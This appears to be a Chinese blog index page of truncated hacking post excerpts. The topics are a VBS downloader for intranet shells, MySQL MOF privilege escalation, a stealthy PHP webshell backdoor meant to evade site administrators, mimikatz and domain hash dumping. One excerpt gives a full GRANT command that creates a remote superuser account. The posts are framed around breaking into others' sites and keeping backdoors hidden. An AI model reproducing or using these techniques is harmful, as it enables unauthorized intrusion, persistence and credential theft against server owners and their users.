摘要:
当拿到shell到手,服务器是内网,你又没有条件映射,服务器又穿不上东西是不是很郁闷,还有我们还有vbs,能执行cmd命令就有希望一、VBS下载者: 复制代码 代码如下:Set Post = CreateObject("Msxml2.XMLHTTP")Set Shell = CreateObjec... 阅读全文
posted @ 2016-01-23 17:48
h4ck0ne
阅读(517)
评论(0)
推荐(0)
摘要:
今天再拿一个站的时候遇到了很多问题,拿站的过程就不说了,其中要用到mof提权,不管能不能提下,我进行一个mof提权的科普这里我综合各类mof提权进行了综合首先说一下,无shell情况下的mysql远程mof提权利用方法详解 就是你注入拿到了数据库的root账号密码,直接进行 扫到一个站的注入 ... 阅读全文
posted @ 2016-01-23 17:48
h4ck0ne
阅读(3290)
评论(0)
推荐(0)
摘要:
经常拿到一些比较好的php站想要留住。插入菜刀一句话,很容易被管理发现,不管是eval还是assert,就是管理发现不了,有时连接也会被各种的安全软件拦截。现在教大家一个简单的技巧。本人一直在用,留的后门没有被删过了。<?phpfile_put_contents('xpxp.php',"$_GET[... 阅读全文
posted @ 2016-01-23 17:48
h4ck0ne
阅读(271)
评论(0)
推荐(0)
摘要:
经擦遇到了MYSQL数据库,想尽办法提权,最终都没有成功,很是郁闷,可能是自己很久没有研究过提权导致的吧,总结一下MYSQL提权的各种姿势吧,权当复习了。关于mysql提权的方法也就那么几种,希望也能帮到各位小伙伴们。一、利用mof提权前段时间国外Kingcope大牛发布了mysql远程提权0day... 阅读全文
posted @ 2016-01-23 17:48
h4ck0ne
阅读(4864)
评论(0)
推荐(0)
摘要:
PHPmyadmin修改用户密码直接点击上面的localhost或者1270.0.1,出现用户一栏,点击修改即可添加超级用户guetsec密码ooxx并且允许外连GRANT ALL PRIVILEGES ON *.* TO 'guetsec'@'%' IDENTIFIED BY 'ooxx' WIT... 阅读全文
posted @ 2016-01-23 17:48
h4ck0ne
阅读(2172)
评论(0)
推荐(0)
摘要:
0x00 前言 上篇测试了中间人攻击利用框架bettercap,这次挑选一款更具代表性的工具——mimikatz 0x01 简介 mimikatz,很多人称之为密码抓取神器,但在内网渗透中,远不止这么简单 0x02 测试环境 网络资源管理模式: 域 已有资源: ... 阅读全文
posted @ 2016-01-23 17:47
h4ck0ne
阅读(1390)
评论(0)
推荐(0)
摘要:
0x00 前言 上一篇学习了如何导出域内所有用户hash,那么,接下来准备用破解出的用户名口令尝试远程登陆目标主机并执行程序,结合实际环境做了如下测试.0x01 目标 远程登陆目标主机执行测试程序 0x02 测试环境 远程主机: ip:192.168.40.137 ... 阅读全文
posted @ 2016-01-23 17:47
h4ck0ne
阅读(2727)
评论(0)
推荐(0)
摘要:
0x00目标: 导出当前域内所有用户的hash0x01测试环境: 域控:server2008 r2杀毒软件:已安装*域控权限:可使用net use远程登陆,不使用33890x02测试方法: (1)mimikatz: hash数量:只能抓取登陆过的用户hash,无法抓取所有... 阅读全文
posted @ 2016-01-23 17:47
h4ck0ne
阅读(2421)
评论(0)
推荐(0)
摘要:
你急有毛用,我电脑没带,怎么搞? 联系了基友adminlm牛看看吧,他说有防护软件啥的,有root,无法UDF,于是我让他去Mof,经历一番周折,知道了,对mof目录也锁定了权限,无法用root导出mof文件到目录。。。卧槽, 由于我无法电脑操作,我又给他提供了一些思路,php无法... 阅读全文
posted @ 2016-01-23 17:47
h4ck0ne
阅读(1148)
评论(0)
推荐(0)
摘要:
经常在服务器提权的时候,尤其是windows环境下,我们发现权限不高,却可以读取mysql的datadir目录,并且能够成功下载user.MYD这个文件。但是在读取内容的时候,经常会遇到root密码hash不完整的情况,手头又没有mysql环境或者 导入出错..可试试下列方法 看图 ... 阅读全文
posted @ 2016-01-23 17:47
h4ck0ne
阅读(2107)
评论(0)
推荐(0)
浙公网安备 33010602011771号